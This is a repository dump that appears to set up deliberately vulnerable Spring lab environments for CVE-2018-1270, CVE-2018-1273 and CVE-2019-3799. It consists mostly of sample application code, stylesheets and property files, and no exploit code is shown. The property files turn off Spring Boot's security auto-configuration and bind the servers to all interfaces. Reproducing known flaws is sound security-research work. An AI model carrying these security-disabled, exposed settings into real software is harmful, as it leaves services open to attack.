17 | }
18 |
19 | @Override
20 | public void registerStompEndpoints(StompEndpointRegistry registry) {
21 | registry.addEndpoint("/gs-guide-websocket").withSockJS();
22 | }
23 |
24 | }
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=0.0.0.0
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/resources/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=0.0.0.0
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/Application.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/Application.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/Greeting.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/Greeting.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/GreetingController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/GreetingController.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/HelloMessage.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/HelloMessage.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/WebSocketConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/WebSocketConfig.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1$1.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$TestSessionHandler.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$TestSessionHandler.class
--------------------------------------------------------------------------------
/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests.class
--------------------------------------------------------------------------------
/CVE-2018-1273/README.md:
--------------------------------------------------------------------------------
1 | # Spring Data - web support example
2 |
3 | This example shows some of the Spring Data integration features with Spring MVC.
4 |
5 | 1. See how we plug into Spring MVC to create `Pageable` instances from request parameters in `UserController.users(…)`.
6 | 2. See how interfaces can be used to bind request payloads in `UserController.UserForm`. Spring Data creates a `Map`-backed proxy for you to easily create form-backing objects.
--------------------------------------------------------------------------------
/CVE-2018-1273/src/main/java/example/users/UserRepository.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015-2021 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * https://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package example.users;
17 |
18 | import java.util.Optional;
19 |
20 | import org.springframework.data.repository.PagingAndSortingRepository;
21 |
22 | /**
23 | * A Spring Data repository to persist {@link User}s.
24 | *
25 | * @author Oliver Gierke
26 | */
27 | interface UserRepository extends PagingAndSortingRepository {
28 |
29 | /**
30 | * Returns the user with the given {@link Username}.
31 | *
32 | * @param username can be {@literal null}.
33 | * @return
34 | */
35 | Optional findByUsername(Username username);
36 | }
37 |
--------------------------------------------------------------------------------
/CVE-2018-1273/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 | spring.autoconfigure.exclude=org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration
4 |
--------------------------------------------------------------------------------
/CVE-2018-1273/src/main/resources/messages.properties:
--------------------------------------------------------------------------------
1 | user.username.empty = Username is required!
2 | user.username.exists = Username already exists!
3 | user.username.invalidFormat = Invalid Username format!
4 | user.password.empty = Password is required!
5 | user.password.no-match = The given passwords don't match!
6 | user.repeatedPassword.empty = Repeated password is required!
7 |
8 |
--------------------------------------------------------------------------------
/CVE-2018-1273/src/main/resources/static/css/style.css:
--------------------------------------------------------------------------------
1 | body {
2 | margin: auto;
3 | width: 50%;
4 | }
5 |
6 | form.user-form {
7 | padding: 9px 14px;
8 | border: 1px solid #e1e1e8;
9 | border-radius: 4px;
10 | }
11 |
12 | .fieldError {
13 | border: 1px solid #a94442;
14 | }
15 |
16 | .errors {
17 | padding: 1em;
18 | margin: 1em 0;
19 | border: 1px solid #eee;
20 | border-left-width: 5px;
21 | border-left-color: #a94442;
22 | border-radius: 5px;
23 | }
24 |
25 | .errors li {
26 | list-style-type: none;
27 | margin: 0.5em 0.7em;
28 | }
29 |
--------------------------------------------------------------------------------
/CVE-2018-1273/src/test/java/example/users/AbstractIntegrationTests.java:
--------------------------------------------------------------------------------
1 | ///*
2 | // * Copyright 2015-2021 the original author or authors.
3 | // *
4 | // * Licensed under the Apache License, Version 2.0 (the "License");
5 | // * you may not use this file except in compliance with the License.
6 | // * You may obtain a copy of the License at
7 | // *
8 | // * https://www.apache.org/licenses/LICENSE-2.0
9 | // *
10 | // * Unless required by applicable law or agreed to in writing, software
11 | // * distributed under the License is distributed on an "AS IS" BASIS,
12 | // * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | // * See the License for the specific language governing permissions and
14 | // * limitations under the License.
15 | // */
16 | //package example.users;
17 | //
18 | //import org.springframework.boot.test.context.SpringBootTest;
19 | //
20 | ///**
21 | // * Integration tests to bootstrap the application.
22 | // *
23 | // * @author Oliver Gierke
24 | // * @author Divya Srivastava
25 | // */
26 | //@SpringBootTest
27 | //abstract class AbstractIntegrationTests {}
28 |
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 | spring.autoconfigure.exclude=org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration
4 |
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/Application.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/Application.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/Password.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/Password.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/User.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/UserManagement.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/UserManagement.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/UserRepository.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/UserRepository.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/Username.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/Username.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/web/UserController$UserForm.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/web/UserController$UserForm.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/example/users/web/UserController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/web/UserController.class
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/messages.properties:
--------------------------------------------------------------------------------
1 | user.username.empty = Username is required!
2 | user.username.exists = Username already exists!
3 | user.username.invalidFormat = Invalid Username format!
4 | user.password.empty = Password is required!
5 | user.password.no-match = The given passwords don't match!
6 | user.repeatedPassword.empty = Repeated password is required!
7 |
8 |
--------------------------------------------------------------------------------
/CVE-2018-1273/target/classes/static/css/style.css:
--------------------------------------------------------------------------------
1 | body {
2 | margin: auto;
3 | width: 50%;
4 | }
5 |
6 | form.user-form {
7 | padding: 9px 14px;
8 | border: 1px solid #e1e1e8;
9 | border-radius: 4px;
10 | }
11 |
12 | .fieldError {
13 | border: 1px solid #a94442;
14 | }
15 |
16 | .errors {
17 | padding: 1em;
18 | margin: 1em 0;
19 | border: 1px solid #eee;
20 | border-left-width: 5px;
21 | border-left-color: #a94442;
22 | border-radius: 5px;
23 | }
24 |
25 | .errors li {
26 | list-style-type: none;
27 | margin: 0.5em 0.7em;
28 | }
29 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/ConfigServerApplication.java:
--------------------------------------------------------------------------------
1 | package org.springframework.cloud.config.server;
2 |
3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
4 | import org.springframework.boot.builder.SpringApplicationBuilder;
5 | import org.springframework.context.annotation.Configuration;
6 |
7 | @Configuration
8 | @EnableAutoConfiguration
9 | @EnableConfigServer
10 | public class ConfigServerApplication {
11 |
12 | public static void main(String[] args) {
13 | new SpringApplicationBuilder(ConfigServerApplication.class)
14 | .properties("spring.config.name=configserver").run(args);
15 | }
16 |
17 | }
18 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/config/ConfigServerConfiguration.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2013-2016 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | *
16 | */
17 |
18 | package org.springframework.cloud.config.server.config;
19 |
20 | import org.springframework.context.annotation.Bean;
21 | import org.springframework.context.annotation.Configuration;
22 |
23 | /**
24 | * @author Spencer Gibb
25 | */
26 | @Configuration
27 | public class ConfigServerConfiguration {
28 | class Marker {}
29 |
30 | @Bean
31 | public Marker enableConfigServerMarker() {
32 | return new Marker();
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/diagnostics/GitUriFailureAnalyzer.java:
--------------------------------------------------------------------------------
1 | package org.springframework.cloud.config.server.diagnostics;
2 |
3 | import org.springframework.boot.diagnostics.AbstractFailureAnalyzer;
4 | import org.springframework.boot.diagnostics.FailureAnalysis;
5 | import org.springframework.cloud.config.server.environment.JGitEnvironmentRepository;
6 |
7 | /**
8 | * @author Ryan Baxter
9 | */
10 | public class GitUriFailureAnalyzer extends AbstractFailureAnalyzer {
11 |
12 | public static final String DESCRIPTION = "Invalid config server configuration.";
13 | public static final String ACTION = "If you are using the git profile, you need to set a Git URI in your " +
14 | "configuration. If you are using a native profile and have spring.cloud.config.server.bootstrap=true, " +
15 | "you need to use a composite configuration.";
16 |
17 | @Override
18 | protected FailureAnalysis analyze(Throwable rootFailure, IllegalStateException cause) {
19 | if(JGitEnvironmentRepository.MESSAGE.equalsIgnoreCase(cause.getMessage())) {
20 | return new FailureAnalysis(DESCRIPTION, ACTION, cause);
21 | }
22 | return null;
23 | }
24 |
25 | }
26 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/EnvironmentEncryptor.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2002-2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.encryption;
18 |
19 | import org.springframework.cloud.config.environment.Environment;
20 |
21 | /**
22 | * Service interface for decrypting properties in Environment object.
23 | *
24 | * @author Bartosz Wojtkiewicz
25 | * @author Rafal Zukowski
26 | *
27 | */
28 | public interface EnvironmentEncryptor {
29 | Environment decrypt(Environment environment);
30 | }
31 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/PassthruSecretLocator.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.encryption;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | public class PassthruSecretLocator implements SecretLocator {
24 |
25 | @Override
26 | public char[] locate(String secret) {
27 | return secret==null ? new char[0] : secret.toCharArray();
28 | }
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/SecretLocator.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.encryption;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | public interface SecretLocator {
24 |
25 | char[] locate(String secret);
26 |
27 | }
28 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/TextEncryptorLocator.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.encryption;
18 |
19 | import java.util.Map;
20 |
21 | import org.springframework.security.crypto.encrypt.TextEncryptor;
22 |
23 | /**
24 | * @author Dave Syer
25 | * @author Bartosz Wojtkiewicz
26 | *
27 | */
28 | public interface TextEncryptorLocator {
29 |
30 | TextEncryptor locate(Map keys);
31 |
32 | }
33 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/ConfigurableHttpConnectionFactory.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.environment;
17 |
18 | import org.eclipse.jgit.transport.http.HttpConnectionFactory;
19 |
20 | /**
21 | * @author Dylan Roberts
22 | */
23 | public interface ConfigurableHttpConnectionFactory extends HttpConnectionFactory {
24 | void addConfiguration(MultipleJGitEnvironmentProperties environmentProperties) throws Exception;
25 | }
26 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentNotFoundException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.environment;
17 |
18 | import org.springframework.http.HttpStatus;
19 | import org.springframework.web.bind.annotation.ResponseStatus;
20 |
21 | /**
22 | * @author Chids
23 | *
24 | */
25 | @SuppressWarnings("serial")
26 | @ResponseStatus(code = HttpStatus.NOT_FOUND, reason = "Application Not Found")
27 | public class EnvironmentNotFoundException extends RuntimeException {
28 |
29 | public EnvironmentNotFoundException(String string) {
30 | super(string);
31 | }
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentRepository.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2013-2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.environment;
17 |
18 | import org.springframework.cloud.config.environment.Environment;
19 |
20 | /**
21 | * @author Dave Syer
22 | * @author Roy Clarkson
23 | */
24 | public interface EnvironmentRepository {
25 |
26 | Environment findOne(String application, String profile, String label);
27 |
28 | }
29 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentRepositoryFactory.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.environment;
17 |
18 | import org.springframework.cloud.config.server.support.EnvironmentRepositoryProperties;
19 |
20 | /**
21 | * @author Dylan Roberts
22 | */
23 | public interface EnvironmentRepositoryFactory {
24 | T build(P environmentProperties) throws Exception;
25 | }
26 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentWatch.java:
--------------------------------------------------------------------------------
1 | package org.springframework.cloud.config.server.environment;
2 |
3 | /**
4 | * @author Spencer Gibb
5 | */
6 | public interface EnvironmentWatch {
7 | String watch(String state);
8 |
9 | class Default implements EnvironmentWatch {
10 |
11 | @Override
12 | public String watch(String state) {
13 | return null;
14 | }
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/NoSuchLabelException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.environment;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | @SuppressWarnings("serial")
24 | public class NoSuchLabelException extends RepositoryException {
25 |
26 | public NoSuchLabelException(String string) {
27 | super(string);
28 | }
29 |
30 | public NoSuchLabelException(String string, Exception e) {
31 | super(string, e);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/NoSuchRepositoryException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.environment;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | @SuppressWarnings("serial")
24 | public class NoSuchRepositoryException extends RepositoryException {
25 |
26 | public NoSuchRepositoryException(String string) {
27 | super(string);
28 | }
29 |
30 | public NoSuchRepositoryException(String string, Exception e) {
31 | super(string, e);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/RepositoryException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.environment;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | @SuppressWarnings("serial")
24 | public class RepositoryException extends RuntimeException {
25 |
26 | public RepositoryException(String string) {
27 | super(string);
28 | }
29 |
30 | public RepositoryException(String message, Throwable cause) {
31 | super(message, cause);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/SerializableMapPropertySource.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2013-2014 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.environment;
17 |
18 | import java.util.Map;
19 |
20 | class SerializableMapPropertySource {
21 |
22 | private String name;
23 | private Map source;
24 |
25 | public SerializableMapPropertySource(String name, Map source) {
26 | this.name = name;
27 | this.source = source;
28 | }
29 |
30 | public String getName() {
31 | return name;
32 | }
33 |
34 | public Map getSource() {
35 | return source;
36 | }
37 |
38 | }
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/resource/NoSuchResourceException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.resource;
18 |
19 | /**
20 | * @author Dave Syer
21 | *
22 | */
23 | public class NoSuchResourceException extends RuntimeException {
24 |
25 | public NoSuchResourceException(String string) {
26 | super(string);
27 | }
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/resource/ResourceRepository.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.resource;
18 |
19 | import org.springframework.core.io.Resource;
20 |
21 | /**
22 | * @author Dave Syer
23 | *
24 | */
25 | public interface ResourceRepository {
26 |
27 | Resource findOne(String name, String profile, String label, String path);
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/ssh/PrivateKeyIsValid.java:
--------------------------------------------------------------------------------
1 | package org.springframework.cloud.config.server.ssh;
2 |
3 | import java.lang.annotation.ElementType;
4 | import java.lang.annotation.Retention;
5 | import java.lang.annotation.RetentionPolicy;
6 | import java.lang.annotation.Target;
7 | import javax.validation.Constraint;
8 | import javax.validation.Payload;
9 |
10 | import org.springframework.validation.annotation.Validated;
11 |
12 | /**
13 | * Beans annotated with {@link PrivateKeyValidator} and {@link Validated} will have the constraints applied.
14 | *
15 | * @author Ollie Hughes
16 | */
17 | @Constraint(validatedBy = PrivateKeyValidator.class)
18 | @Target(ElementType.TYPE)
19 | @Retention(RetentionPolicy.RUNTIME)
